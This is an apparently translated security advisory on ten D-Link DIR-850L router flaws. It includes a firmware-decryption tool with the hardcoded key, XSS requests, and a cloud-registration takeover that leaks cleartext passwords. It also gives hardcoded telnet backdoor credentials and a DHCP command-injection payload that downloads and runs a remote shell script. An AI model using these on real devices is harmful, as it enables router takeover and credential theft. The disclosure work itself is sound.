Summary: According to the researcher, the D-Link 850L is a badly designed router with a lot of vulnerabilities. From the LAN to the WAN, basically everything is wrong with it.

Preface

Recently, security researcher Pierre Kim published 10 serious vulnerabilities in the D-Link DIR 850L consumer wireless router.

The disclosed D-Link vulnerabilities cover many areas, such as the lack of a proper protection mechanism for firmware images, meaning that an attacker can push a malicious copy containing a backdoor onto a target device, and flaws in D-Link's proprietary mydlink cloud protocol. Pierre Kim also found remote code execution vulnerabilities, default keys, and a DDoS (distributed denial of service) risk. Other issues include cross-site scripting (XSS), passwords stored in cleartext, and a LAN backdoor.

Pierre Kim sums it up: "The D-Link 850L is a badly designed router with a lot of vulnerabilities. From the LAN to the WAN, basically everything is wrong with it."

I. Lack of firmware image protection

The latest firmware for the D-Link 850L revA (DIR850L_REVA_FW114WWb07_h2ab_beta1.bin) is not protected, so an attacker can forge an image that passes as the latest firmware.

The latest firmware images for the D-Link 850L revB (DIR850LB1_FW207WWb05.bin, DIR850L_REVB_FW207WWb05_h1ke_beta1.bin and DIR850LB1FW208WWb02.bin) are encrypted with a hardcoded password.

Below is a program that decrypts such a firmware image:

/* 
 * Simple tool to decrypt D-LINK DIR-850L REVB firmwares 
 *
 * $ gcc -o revbdec revbdec.c
 * $ ./revbdec DIR850L_REVB_FW207WWb05_h1ke_beta1.bin wrgac25_dlink.2013gui_dir850l > DIR850L_REVB_FW207WWb05_h1ke_beta1.decrypted
 */

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define USAGE "Usage: decimg <filename> <key>\n"

int main(int argc, char **argv)
{
        int     i, fi;
        int     fo = STDOUT_FILENO, fe = STDERR_FILENO;

        if (argc != 3)
        {
                write(fe, USAGE, strlen(USAGE));
                return (EXIT_FAILURE);
        }

        if ((fi = open(argv[1], O_RDONLY)) == -1)
        {
                perror("open");
                write(fe, USAGE, strlen(USAGE));
                return (EXIT_FAILURE);
        }

        const char *key = argv[2];
        int kl = strlen(key);

        /* i is the absolute offset of the current chunk, so the keystream
         * position (i + j) stays continuous across 4096-byte reads. */
        i = 0;
        while (1)
        {
                char buffer[4096];
                int j, len;
                len = read(fi, buffer, 4096);
                if (len <= 0)
                        break;
                for (j = 0; j < len; j++) {
                        /* position-dependent byte in 1..0xFB ... */
                        buffer[j] ^= (i + j) % 0xFB + 1;
                        /* ... then the repeating hardcoded key; the same XOR
                         * both encrypts and decrypts, so nothing is authenticated */
                        buffer[j] ^= key[(i + j) % kl];
                }
                write(fo, buffer, len);
                i += len;
        }

        return (EXIT_SUCCESS);
}

You can use this program to decrypt the firmware image:

user@host:~/petage-dlink$ ./revbdec DIR850L_REVB_FW207WWb05_h1ke_beta1.bin wrgac25_dlink.2013gui_dir850l > DIR850L_REVB_FW207WWb05_h1ke_beta1.decrypted
user@host:~/petage-dlink$ binwalk DIR850L_REVB_FW207WWb05_h1ke_beta1.decrypted

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             DLOB firmware header, boot partition: "dev=/dev/mtdblock/1"
593           0x251           LZMA compressed data, properties: 0x88, dictionary size: 1048576 bytes, uncompressed size: 65535 bytes
10380         0x288C          LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 5184868 bytes
1704052       0x1A0074        PackImg section delimiter tag, little endian size: 10518016 bytes; big endian size: 8298496 bytes
1704084       0x1A0094        Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 8296266 bytes, 2678 inodes, blocksize: 131072 bytes, created: 2017-01-20 06:39:29

So the protection of the firmware images is effectively nonexistent.

II. Cross-site scripting (XSS)

Simply by analysing the PHP files in /htdocs/web, several exploitable XSS vulnerabilities can be found.

An attacker can use XSS against an authenticated user in order to steal the authentication cookie.

/htdocs/web/wpsacts.php:

user@host:~/petage-dlink$ wget -qO- --post-data='action=<a>' http://ip:port/wpsacts.php
<?xml version="1.0" encoding="utf-8"?>
<wpsreport>
        <action><a></action>
        <result></result>
        <reason></reason>
</wpsreport>


user@host:~/petage-dlink$ cat ./fs/htdocs/web/wpsacts.php
[..]
<wpsreport>
        <action><?echo $_POST["action"];?></action>
[...]

XSS in /htdocs/web/shareport.php:

[...]
         <action><?echo $_POST["action"];?></action>
[...]

XSS in /htdocs/web/sitesurvey.php:

[...]
        <action><?echo $_POST["action"];?></action>
[...]

XSS in /htdocs/web/wandetect.php:

[...]
   <action><?echo $_POST["action"];?></action>
[...]

XSS in /htdocs/web/wpsacts.php:

[...]
   <action><?echo $_POST["action"];?></action>
[...]

III. Vulnerabilities in the mydlink cloud protocol

An attacker can gain full access to the device by abusing D-Link's custom mydlink cloud protocol.

http://ip_of_router/register_send.php does not check that the user is authenticated, so an attacker can abuse this page, which is used to register the device to the myDlink cloud infrastructure, to take control of the device.

The attacker will use the unauthenticated /register_send.php page to:

1. create a MyDlink cloud account;

2. register this account on the device;

3. add the device to this account, so that the device is pushed to the cloud platform together with its admin password, which also means the password is stored in cleartext.

First, the attacker uses Firefox 50 to visit the D-Link login page https://www.mydlink.net.cn/entrance, from which the device can be controlled remotely (for example by rebooting it). Note that Firefox 50 must have the official D-Link NPAPI extension installed.

Second, using the Firefox developer tools, the attacker can analyse the default HTTP requests and responses exchanged with the D-Link API at www.mydlink.com. By default, the D-Link cloud API leaks the device's password in the response to a PUT request: just by looking at the HTTP requests made by the NPAPI plugin, the device's password can be found in cleartext.

Finally, the NPAPI plugin automatically sets up a tunnel between the router and the Firefox browser, so the attacker can control the remote router by browsing http://127.0.0.1:dynamically_generated_remote_port/. The traffic goes to Amazon servers and then on to the remote D-Link router:

Firefox NPAPI client (http://127.0.0.1:remote_port/)   ->    Amazon   ->    Dlink 850L HTTP Interface.

Using the password obtained earlier from the legitimate HTTPS response of the D-Link API, the attacker can log in to the router. At this point the attacker has full control over the router.

This is done by the signalc program (inside /mydlink/), which creates a TCP tunnel to the Amazon servers.

The PHP script at http://ip_of_router/register_send.php acts as a proxy between the attacker and the remote D-Link API; this page also retrieves the password (stored in cleartext) and sends it to the remote D-Link API.

$devpasswd = query("/device/account/entry/password");   // <- $devpasswd contains the password of the device
$action = $_POST["act"];

The password is sent to the Mydlink cloud service when the device is associated (third request: adddev), see &device_password=$devpasswd:

//sign up
$post_str_signup = "client=wizard&wizard_version=" .$wizard_version. "&lang=" .$_POST["lang"].
                   "&action=sign-up&accept=accept&email=" .$_POST["outemail"]. "&password=" .$_POST["passwd"].
                   "&password_verify=" .$_POST["passwd"]. "&name_first=" .$_POST["firstname"]. "&name_last=" .$_POST["lastname"]." ";

$post_url_signup = "/signin/";

$action_signup = "signup";

//sign in       
$post_str_signin = "client=wizard&wizard_version=" .$wizard_version. "&lang=" .$_POST["lang"].
            "&email=" .$_POST["outemail"]. "&password=" .$_POST["passwd"]." ";

$post_url_signin = "/account/?signin";

$action_signin = "signin";

//add dev (bind device)
$post_str_adddev = "client=wizard&wizard_version=" .$wizard_version. "&lang=" .$_POST["lang"].
            "&dlife_no=" .$mydlink_num. "&device_password=" .$devpasswd. "&dfp=" .$dlinkfootprint." ";

$post_url_adddev = "/account/?add";

$action_adddev = "adddev";

//main start
if($action == $action_signup)                    <---- first request
{
        $post_str = $post_str_signup;
        $post_url = $post_url_signup;
        $withcookie = "";   //signup dont need cookie info
}
else if($action == $action_signin)               <---- second request
{
        $post_str = $post_str_signin;
        $post_url = $post_url_signin;
        $withcookie = "\r\nCookie:; mydlink=pr2c11jl60i21v9t5go2fvcve2;";
}
else if($action == $action_adddev)               <---- 3rd request
{
        $post_str = $post_str_adddev;
        $post_url = $post_url_adddev;
}

To exploit this vulnerability, Pierre sent 3 HTTP requests to the D-Link router:

The first one is the signup request, which creates a user on the MyDlink service:

user@host:~/petage-dlink$ wget -qO- --user-agent="" --post-data 'act=signup&lang=en&outemail=EMAIL_ADDRESS&passwd=SUPER_PASSWORD&firstname=xxxxxxxx&lastname=xxxxxxxx' http://ip/register_send.php

<?xml version="1.0"?>
<register_send>
   <result>success</result>
   <url>http://mp-us-portal.auto.mydlink.com</url>
</register_send>

Internally, this request is built and sent to the MyDlink cloud API:

$post_str_signup = "client=wizard&wizard_version=" .$wizard_version. "&lang=" .$_POST["lang"].
                   "&action=sign-up&accept=accept&email=" .$_POST["outemail"]. "&password=" .$_POST["passwd"].
                   "&password_verify=" .$_POST["passwd"]. "&name_first=" .$_POST["firstname"]. "&name_last=" .$_POST["lastname"]." ";

The second one is the signin request, with which the router associates itself with the newly created (but not yet activated) user:

user@host:~/petage-dlink$ wget -qO- --user-agent="" --post-data 'act=signin&lang=en&outemail=EMAIL_ADDRESS&passwd=SUPER_PASSWORD&firstname=xxxxxxxx&lastname=xxxxxxxx' http://ip/register_send.php

<?xml version="1.0"?>
<register_send>
  <result>success</result>
  <url>http://mp-us-portal.auto.mydlink.com</url>
</register_send>

Internally, this request is built and sent to the MyDlink cloud API:

$post_str_signin = "client=wizard&wizard_version=" .$wizard_version. "&lang=" .$_POST["lang"].
            "&email=" .$_POST["outemail"]. "&password=" .$_POST["passwd"]." ";

The last request associates the device with the D-Link service and sends the device's password to D-Link's remote API:

user@host:~/petage-dlink$ wget -qO- --user-agent="" --post-data 'act=adddev&lang=en' http://ip/register_send.php

<?xml version="1.0"?>
<register_send>
  <result>success</result>
  <url>http://mp-us-portal.auto.mydlink.com</url>
</register_send>

Internally, this request is built and sent to the MyDlink cloud API:

$post_str_adddev = "client=wizard&wizard_version=" .$wizard_version. "&lang=" .$_POST["lang"].
            "&dlife_no=" .$mydlink_num. "&device_password=" .$devpasswd. "&dfp=" .$dlinkfootprint." ";

Now use the confirmation e-mail sent by D-Link:

[screenshot: 2017-dlink-000-activation-email.png]

Then go to http://mydlink.com/ and log in with the e-mail address and password.

At this point you will see the device listed in the web interface.

Below are screenshots showing the available management options:

[screenshot: 2017-dlink-001-webpage.png]

[screenshot: 2017-dlink-002-webpage.png]

[screenshot: 2017-dlink-004-webpage.png]

By analysing these requests, Pierre could obtain more information about the targeted router (note that these requests are the default ones made when browsing the www.mydlink.com website):

[screenshot: 2017-dlink-005-dev-tools.png]

A PUT request (PUT identifier-of-the-router) appears, whose response provides the device's cleartext password.

[screenshot: 2017-dlink-006-dev-tools.png]

Note the GET request at the end of the image.

https://eu.mydlink.com/device/devices/DEVICEID?_=SOME_RANDOM_DATA&access_token=ACCESS_TOKEN

The POST data is as follows:

{"id":"EDITED_DEVICE_ID","order":0,"mac":"EDITED_MAC_ADDRESS","model":"DIR-850L","ddnsServer":"eu.mydlink.com","activatedDate":"EDITED_ACTIVATION_DATE","hwVer":"B1","selected":true,"defaultIconUrl":"https://d3n8c69ydsbj5n.cloudfront.net/Product/Pictures/DIR-850L/DIR-850L_default.gif","type":"router","series":"","name":"","authKey":"","status":"","adminPassword":"","plainPassword":"","fwUpgrade":false,"fwVer":"","provVer":"","binded":true,"registered":null,"supportHttps":null,"signalAddr":"","features":[],"serviceCnvr":{"enabled":false,"plan":"","space":0,"expireTime":0,"contentValidThru":0},"serviceLnvr":{"targetStorageId":null,"targetStorageVolumeId":null},"added2UniPlugin":false,"connections":[{"id":"http","scheme":"http","tunnel":null,"ip":null,"port":null},{"id":"httpWithCredential","scheme":"http","tunnel":null,"ip":null,"port":null},{"id":"https","scheme":"https","tunnel":null,"ip":null,"port":null},{"id":"httpsWithCredential","scheme":"https","tunnel":null,"ip":null,"port":null},{"id":"liveview","scheme":"","tunnel":null,"ip":null,"port":null},{"id":"playback","scheme":"","tunnel":null,"ip":null,"port":null},{"id":"config","scheme":"","tunnel":null,"ip":null,"port":null}]}

The response, in cleartext (containing the device's password), is:

{"name":"DIR-850L","status":"online","authKey":"EDITED","adminPassword":"password","plainPassword":"password","fwUpgrade":false,"fwVer":"2.07","provVer":"2.0.18-b04","binded":true,"registered":true,"supportHttps":true,"signalAddr":"mp-eu-signal.auto.mydlink.com","features":[1,2,3,4,28,29],"serviceCnvr":{"enabled":false,"plan":"","space":0,"expireTime":0,"contentValidThru":0},"serviceLnvr":{"targetStorageId":null,"targetStorageVolumeId":null}}

A GET request (the last one in the previous image) then allows retrieving the current password as well as the previous one:

[screenshot: 2017-dlink-get-password.png]

The GET request is:

GET https://eu.mydlink.com/device/devices/DEVICE_ID?_=RANDOM_NUMBER&access_token=ACCESS_TOKEN HTTP/1.1

The response is the same, with the previous password in cleartext and the new one (adminPassword):

{"name":"DIR-850L","status":"online","authKey":"EDITED","adminPassword":"password","plainPassword":"PASSWORD","fwUpgrade":false,"fwVer":"2.07","provVer":"2.0.18-b04","binded":true,"registered":true,"supportHttps":true,"signalAddr":"mp-eu-signal.auto.mydlink.com","features":[1,2,3,4,28,29],"serviceCnvr":{"enabled":false,"plan":"","space":0,"expireTime":0,"contentValidThru":0},"serviceLnvr":{"targetStorageId":null,"targetStorageVolumeId":null}}

Finally, the request from the NPAPI plugin, which sets up the tunnel between the browser and the remote router:

[screenshot: 2017-dlink-get-password.png]

The request to /tssm/tssml.php makes the remote cloud platform forward traffic to device number 3xxxxxxxxx through the cloud; it gives the attacker the details of the newly established TCP tunnel from the browser's NPAPI extension to the D-Link 850L router:

https://eu.mydlink.com/tssm/tssml.php?id=EDITED&no=EDITED_DEVICE_ID&type=1&state=3&status=1&ctype=4&browser=Mozilla/5.0+(Windows+NT+6.1;+rv:50.0)+Gecko/20100101+Firefox/50.0&message=[{"service":"http","scheme":"http","tunnel":"relay","ip":"127.0.0.1","port":50453},{"service":"https","scheme":"https","tunnel":"relay","ip":"127.0.0.1","port":50454}]&_=EDITED_RANDOM_VALUE

It looks like the plugin listens on 127.0.0.1:50453/tcp (HTTP) and 127.0.0.1:50454/tcp (HTTP/SSL), as shown below:

[screenshot: 2017-dlink-008-cmd.png]

Now Pierre browses to http://127.0.0.1:50453, and the traffic is sent to the remote router through the cloud protocol.

[screenshot: 2017-dlink-009-router.png]

Using the leaked password found earlier (in the PUT and GET requests), the attacker can remotely pwn the router and update its firmware:

[screenshot: 2017-dlink-010-router.png]

These vulnerabilities may affect several D-Link NAS devices, routers and cameras.

Interestingly, D-Link stores all the device passwords of the mydlink service in cleartext.

IV. Vulnerabilities in the router's WAN cloud protocol

The MyDlink cloud protocol is weak. By default it provides no encryption; it is just a basic TCP relay. All traffic is sent over TCP to the remote Amazon servers without encryption:

[screenshot: 2017-wireshark-54.194.162.84.2048-tcp.png]

The TCP relay uses the HTTPS server of the D-Link router as its endpoint, so the router is reachable through the TCP tunnel over both HTTP and HTTPS. By default you can see, from the browser (through the tunnel), the HTTP and HTTPS requests going to the router. For the HTTPS requests, the SSL certificate presented by the router is self-signed, so an attacker can forge and use an invalid certificate to successfully man-in-the-middle the device and intercept information. Worse, by default the TCP relay built by the NPAPI plugin uses plain HTTP.

The /mydlink/signalc program running inside the router derives a unique identifier from the device's MAC address; this identifier does not change even if the D-Link device is reset or linked to a new D-Link cloud account. The device's MAC address can be changed with the rgbin binary: /usr/sbin/devdata is a symlink to /usr/sbin/rgbin, and argv[0] must be devdata for the program to run as follows:

# /usr/sbin/devdata dump # will dump all the configuration
# /usr/sbin/devdata set -e lanmac=00:11:22:33:44:55 # will define a new mac address for the lan interface

This program only rewrites the contents of /dev/mtdblock/4.

The mydlink interface lets the user enter gmail/hotmail account credentials, which are then transferred to the router through the tunnel established by the cloud protocol. This does not seem like a good idea: the traffic between the router and the cloud platform is unencrypted, or uses a self-signed certificate that is never validated, and the password travels over the Internet through this tunnel.

These vulnerabilities may affect several D-Link NAS devices, routers and cameras, as well as every device that supports the MyDlink cloud protocol.

Below are some Wireshark captures (cleartext traffic and self-signed certificate):

[screenshot: 2017-dlink-cloud-cleartext.png]

[screenshot: 2017-dlink-cloud-ssl.png]

V. LAN backdoor

On revB, if you reset the device, the /etc/init0.d/S80mfcd.sh script starts the mfcd binary with the following arguments:

mfcd -l /usr/sbin/login -u Alphanetworks:$image_sign -i br0 &

mfcd is in fact a telnetd server; the -u flag defines the authorized user together with its password (the $image_sign variable).

br0 is the bridge of the eth0, peth0, wlan0 and wlan1 interfaces, so this backdoor is only reachable from the LAN.

user@host:~/petage-dlink$ cat fs/etc/init0.d/S80mfcd.sh
#!/bin/sh
echo [$0]: $1 ... > /dev/console
orig_devconfsize=`xmldbc -g /runtime/device/devconfsize` 
entn=`devdata get -e ALWAYS_TN`
if [ "$1" = "start" ] && [ "$entn" = "1" ]; then
        mfcd -i br0 -t 99999999999999999999999999999 &
        exit
fi

if [ "$1" = "start" ] && [ "$orig_devconfsize" = "0" ]; then

        if [ -f "/usr/sbin/login" ]; then
                image_sign=`cat /etc/config/image_sign`
                mfcd -l /usr/sbin/login -u Alphanetworks:$image_sign -i br0 &
        else
                mfcd &
        fi 
else
        killall mfcd
fi

Using the login Alphanetworks and the password wrgac25_dlink.2013gui_dir850l, an attacker gets a root shell on the device:

user@host:~/petage-dlink$ telnet 192.168.0.1
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
Login: Alphanetworks
Password: wrgac25_dlink.2013gui_dir850l


BusyBox v1.14.1 (2017-01-20 14:35:27 CST) built-in shell (msh)
Enter 'help' for a list of built-in commands.

# echo what
what
#

VI. Private key vulnerability

The private key is hardcoded in the firmware and used for HTTPS administration, which allows an attacker to perform SSL man-in-the-middle attacks:

# ls -la /etc/stunnel.key
-rwxr-xr-x    1 root     root         1679 Jan 20  2017 /etc/stunnel.key
# cat /etc/stunnel.key
-----BEGIN RSA PRIVATE KEY-----
[...]
-----END RSA PRIVATE KEY-----
# cat /etc/stunnel_cert.pem
Certificate:
Data:
    Version: 3 (0x2)
    Serial Number:
        87:6f:88:76:87:df:e7:78
    Signature Algorithm: sha1WithRSAEncryption
    Issuer: C=TW, ST=Taiwan, O=None, OU=None, CN=General Root CA/[email protected]
    Validity
        Not Before: Feb 22 06:04:36 2012 GMT
        Not After : Feb 17 06:04:36 2032 GMT
    Subject: C=TW, ST=Taiwan, L=HsinChu, O=None, OU=None, CN=General Router/[email protected]
    Subject Public Key Info:
        Public Key Algorithm: rsaEncryption
            Public-Key: (2048 bit)
            Modulus:
            Exponent: 65537 (0x10001)
    X509v3 extensions:
        X509v3 Basic Constraints: 
            CA:FALSE
        Netscape Comment: 
            OpenSSL Generated Certificate
        X509v3 Subject Key Identifier: 
            B5:BF:D1:A5:D6:6F:20:B0:89:1F:A6:C1:58:05:31:B2:B3:D0:C1:01
        X509v3 Authority Key Identifier: 
            keyid:5D:F8:E9:B5:F1:57:A4:90:94:BB:9F:DB:F7:91:95:E7:1C:A2:E7:D2

Signature Algorithm: sha1WithRSAEncryption
-----BEGIN CERTIFICATE-----
[...]
-----END CERTIFICATE-----

VII. DNS configuration vulnerability

An attacker can change the DNS configuration through the htdocs/parentalcontrols/bind.php file, which does not verify the identity of the administrative user when reconfiguring.

Since there is neither any limit on HTTP requests nor any authentication, an attacker can brute-force the nonce (?nonce=integer):

$uptime_limit = query(INF_getinfpath($WAN1)."/open_dns/nonce_uptime") + 1800;
if(query(INF_getinfpath($WAN1)."/open_dns/nonce")!=$_GET["nonce"] || $_GET["nonce"]=="")
{
        $Response="BindError";
}
else if(query("/runtime/device/uptime") > $uptime_limit)
{
        $Response="BindTimeout";
}

The attacker can then define new DNS servers:

        set(INF_getinfpath($WAN1)."/open_dns/deviceid", $_GET["deviceid"]);
        set(INF_getinfpath($WAN1)."/open_dns/parent_dns_srv/dns1", $_GET["dnsip1"]);
        set(INF_getinfpath($WAN1)."/open_dns/parent_dns_srv/dns2", $_GET["dnsip2"]);

An attacker can use this vulnerability to redirect traffic to servers under his control, and thus impersonate the D-Link cloud servers and control the D-Link router.

VIII. Cleartext password storage

Pierre found weak permissions on the following 5 files:

1. /var/passwd

/var/passwd contains credentials in cleartext, and its permissions are -rw-rw-rw- (666):

# ls -la /var/passwd
-rw-rw-rw-    1 root     root           28 Jan  1 00:00 /var/passwd
# cat /var/passwd
"Admin" "password" "0"

2. /var/etc/hnapasswd

Note that an attacker can retrieve the password in cleartext from /var/etc/hnapasswd:

# cat /var/etc/hnapasswd
Admin:password

The permissions of /var/etc/hnapasswd are -rw-rw-rw- (666):

# ls -la /var/etc/hnapasswd
-rw-rw-rw-    1 root     root           20 Jan  1 00:00 /var/etc/hnapasswd

3. /etc/shadow

/etc/shadow is a symlink to /var/etc/shadow, and /var/etc/shadow is readable by everyone, as shown below:

# ls -al /etc/shadow 
lrwxrwxrwx    1 root     root           15 Jan 20  2017 /etc/shadow -> /var/etc/shadow
# ls -la /var/etc/shadow
-rw-r--r--    1 root     root           93 Jan  1 00:00 /var/etc/shadow

This file contains the DES hash of the admin user:

# cat /var/etc/shadow
root:!:10956:0:99999:7:::
nobody:!:10956:0:99999:7:::
Admin:zVc1PPVw2VWMc:10956:0:99999:7:::

4. /var/run/storage_account_root

/var/run/storage_account_root contains credentials in cleartext, and its permissions are -rw-rw-rw- (666):

# ls -la /var/run/storage_account_root
-rw-rw-rw-    1 root     root           40 Jan  1 00:00 /var/run/storage_account_root
# cat /var/run/storage_account_root
admin:password,:::
jean-claude:dusse,:::

5. /var/run/hostapd*

The /var/run/hostapd* files contain the wireless passwords in cleartext, and their permissions are -rw-rw-rw- (666):

# ls -la /var/run/hostapd*
-rw-rw-rw-    1 root     root           73 Jan  1 00:00 /var/run/hostapd-wlan1wps.eap_user
-rw-rw-rw-    1 root     root         1160 Jan  1 00:00 /var/run/hostapd-wlan1.conf
-rw-rw-rw-    1 root     root           73 Jan  1 00:00 /var/run/hostapd-wlan0wps.eap_user
-rw-rw-rw-    1 root     root         1170 Jan  1 00:00 /var/run/hostapd-wlan0.conf
# cat /var/run/hostapd*|grep -i pass
wpa_passphrase=aaaaa00000
wpa_passphrase=aaaaa00000
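As an added example (not from the advisory), the Python audit below walks an extracted root filesystem and reports files that are world-writable or are world-readable credential stores, then greps the matching files for the cleartext patterns seen in the listings above. The sample tree is constructed in a temporary directory with paths, modes and contents taken from this section; the name and content patterns are an assumed policy, not anything taken from the firmware.

```python
import os
import re
import shutil
import stat
import tempfile

# Assumed policy: file names this section shows holding credentials, and
# line shapes that indicate credential material (hostapd passphrase,
# user:secret records, and the "user" "password" form of /var/passwd).
SENSITIVE_NAMES = re.compile(
    r"(^|/)(passwd|shadow|hnapasswd|storage_account_root|hostapd-.*\.conf)$")
SECRET_LINES = re.compile(
    r'^(wpa_passphrase=|[A-Za-z0-9_-]+:[^:!*\s]+,?|"[^"]+" "[^"]+" )', re.M)


def audit_tree(root):
    """Return sorted (path, mode, problems) findings for files under root.

    Paths are reported relative to root with a leading '/', so an extracted
    firmware tree reads like the device's own filesystem."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = "/" + os.path.relpath(full, root).replace(os.sep, "/")
            st = os.lstat(full)
            if stat.S_ISLNK(st.st_mode):
                continue  # judge the target, not the link (cf. /etc/shadow -> /var/etc/shadow)
            mode = stat.S_IMODE(st.st_mode)
            sensitive = bool(SENSITIVE_NAMES.search(rel))
            problems = []
            if mode & stat.S_IWOTH:
                problems.append("world-writable")
            if sensitive and mode & stat.S_IROTH:
                problems.append("world-readable credential file")
            if sensitive:
                with open(full, "r", errors="replace") as fh:
                    if SECRET_LINES.search(fh.read()):
                        problems.append("credential content")
            if problems:
                findings.append((rel, oct(mode), ", ".join(problems)))
    return sorted(findings)


def build_sample_tree():
    """Constructed sample mirroring the listings in this section, plus one benign file."""
    root = tempfile.mkdtemp(prefix="dir850l-fs-")
    samples = {
        "var/passwd": (0o666, '"Admin" "password" "0"\n'),
        "var/etc/hnapasswd": (0o666, "Admin:password\n"),
        "var/etc/shadow": (0o644, "root:!:10956:0:99999:7:::\n"
                                   "Admin:zVc1PPVw2VWMc:10956:0:99999:7:::\n"),
        "var/run/storage_account_root": (0o666, "admin:password,:::\n"),
        "var/run/hostapd-wlan0.conf": (0o666, "interface=wlan0\nwpa_passphrase=aaaaa00000\n"),
        "var/TZ": (0o644, "GMT0\n"),  # benign control: readable, not a credential store
    }
    for rel, (mode, content) in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    try:
        for rel, mode, problems in audit_tree(sample_root):
            print("%-32s %s  %s" % (rel, mode, problems))
    finally:
        shutil.rmtree(sample_root)
```

Pointing `audit_tree` at a real extracted squashfs (or at `/` over the telnet access shown above) reports the same five files; the benign /var/TZ is not flagged.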

IX. RCE vulnerability

The DHCP client running on the router is vulnerable to several command injections.

Serve the following configuration with the dhcpd.conf file:

rasp-pwn-dlink# cat /etc/dhcp/dhcpd.conf
option domain-name ";wget -O /var/re http://10.254.239.1/dhcp-rce ; sh /var/re;";
option domain-name-servers 8.8.8.8, 8.8.4.4;
default-lease-time 600;
max-lease-time 7200;
ddns-update-style none;
subnet 10.254.239.0 netmask 255.255.255.224 {
  range 10.254.239.10 10.254.239.20;
  option routers 10.254.239.1;
}
rasp-pwn-dlink# ifconfig eth1
eth1      Link encap:Ethernet  HWaddr 00:0e:c6:aa:aa:aa  
          inet addr:10.254.239.1  Bcast:10.254.239.255  Mask:255.255.255.0
          inet6 addr: fe80::20e:caaa:aaaa:aaa/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:129 errors:0 dropped:0 overruns:0 frame:0
          TX packets:107 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:11181 (10.9 KiB)  TX bytes:49155 (48.0 KiB)

rasp-pwn-dlink# cat /var/www/html/dhcp-rce 
#!/bin/sh

wget -O /var/telnetd-dhcpd-wan http://10.254.239.1/dlink-telnetd
chmod 777 /var/telnetd-dhcpd-wan
(for i in 0 1 2 3; do # win races against legit iptables rules
iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
sleep 10
done ) &

/var/telnetd-dhcpd-wan -l /bin/sh -p 110 &

rasp-pwn-dlink# dhcpd eth1
Internet Systems Consortium DHCP Server 4.3.1
Copyright 2004-2014 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Config file: /etc/dhcp/dhcpd.conf
Database file: /var/lib/dhcp/dhcpd.leases
PID file: /var/run/dhcpd.pid
Wrote 1 leases to leases file.
Listening on LPF/eth1/00:0e:c6:aa:aa:aa/10.254.239.0/27
Sending on   LPF/eth1/00:0e:c6:aa:aa:aa/10.254.239.0/27
Sending on   Socket/fallback/fallback-net
rasp-pwn-dlink#

When the router sends its DHCP request at boot, it connects from the WAN to the remote HTTP server:

rasp-pwn-dlink# tail -f /var/log/nginx/access.log
10.254.239.10 - - [03/Jul/2017:15:40:30 +0000] "GET /dhcp-rce HTTP/1.1" 200 383 "-" "Wget"
10.254.239.10 - - [03/Jul/2017:15:40:30 +0000] "GET /dlink-telnetd HTTP/1.1" 200 10520 "-" "Wget"
10.254.239.10 - - [03/Jul/2017:15:40:30 +0000] "GET /dhcp-rce HTTP/1.1" 200 383 "-" "Wget"
10.254.239.10 - - [03/Jul/2017:15:40:30 +0000] "GET /dlink-telnetd HTTP/1.1" 200 10520 "-" "Wget"

Pierre now has a telnetd reachable from the WAN:

rasp-pwn-dlink# telnet 10.254.239.10 110
Trying 10.254.239.10...
Connected to 10.254.239.10.
Escape character is '^]'.


BusyBox v1.14.1 (2017-01-20 14:35:27 CST) built-in shell (msh)
Enter 'help' for a list of built-in commands.

# uname -ap
Linux dlinkrouter 2.6.30.9 #1 Fri Jan 20 14:12:50 CST 2017 rlx GNU/Linux
# cd /var
# ls -la
drwxr-xr-x    5 root     root            0 Jan  1 00:00 etc
drwxr-xr-x    2 root     root            0 Jan  1  1970 log
drwxr-xr-x    3 root     root            0 Jan  1 00:00 run
drwxr-xr-x    2 root     root            0 Jan  1  1970 sealpac
drwxr-xr-x    4 root     root            0 Jan  1 00:00 tmp
drwxr-xr-x    2 root     root            0 Jan  1  1970 dnrd
drwxr-xr-x    4 root     root            0 Jan  1  1970 htdocs
-rw-r--r--    1 root     root           10 Jan  1  1970 TZ
drwxr-xr-x    2 root     root            0 Jan  1 00:00 servd
-rw-r--r--    1 root     root         5588 Jan  1  1970 default_wifi.xml
-rw-rw-rw-    1 root     root           28 Jan  1 00:00 passwd
drwxrwx---    2 root     root            0 Jan  1 00:00 session
srwxr-xr-x    1 root     root            0 Jan  1 00:00 gpio_ctrl
-rw-r--r--    1 root     root            2 Jan  1 00:00 sys_op
drwxr-xr-x    2 root     root            0 Jan  1 00:00 home
lrwxrwxrwx    1 root     root           16 Jan  1 00:00 portal_share -> /var/tmp/storage
drwxr-xr-x    3 root     root            0 Jan  1 00:00 proc
-rwxr-xr-x    1 root     root          856 Jan  1 00:00 killrc0
drwxr-xr-x    2 root     root            0 Jan  1 00:00 porttrigger
-rw-r--r--    1 root     root          383 Jan  1 00:00 re
-rwxrwxrwx    1 root     root        10520 Jan  1 00:00 telnetd-dhcpd-wan
-rw-rw-rw-    1 root     root          301 Jan  1 00:00 rendezvous.conf
-rw-rw-rw-    1 root     root          523 Jan  1 00:00 stunnel.conf
-rw-rw-rw-    1 root     root          282 Jan  1 00:00 topology.conf
-rw-rw-rw-    1 root     root          394 Jan  1 00:00 lld2d.conf
-rw-r--r--    1 root     root          199 Jan  1 00:00 hosts
drwxr-xr-x   16 root     root          241 Jan 20  2017 ..
drwxr-xr-x   14 root     root            0 Jan  1 00:00 .
# cat re
#!/bin/sh

wget -O /var/telnetd-dhcpd-wan http://10.254.239.1/dlink-telnetd
chmod 777 /var/telnetd-dhcpd-wan
